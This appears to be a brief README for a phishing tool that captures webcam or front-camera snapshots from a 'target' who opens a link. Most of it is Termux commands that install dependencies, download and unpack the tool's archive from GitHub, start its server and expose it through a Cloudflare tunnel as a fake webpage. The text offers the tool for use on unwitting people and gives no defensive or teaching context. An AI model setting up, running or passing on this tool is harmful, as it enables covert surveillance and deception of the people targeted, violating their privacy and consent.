Grab cam shots from target's phone front camera or PC webcam just sending a link. https://youtu.be/92GK_ySPLmU
pkg update && pkg upgrade -y
pkg install curl git nodejs cloudflared
curl -L -o cambest.tar.gz https://github.com/webappsite/Camphish/raw/refs/heads/main/cambest.tar.gz
tar -xvzf cambest.tar.gz && rm cambest.tar.gz
cd cambest
npm start
cloudflared tunnel --url localhost:5000
Hosts a fake webpage using a server and tunnel (ngrok or Cloudflare)
Requests and captures webcam snapshots from the target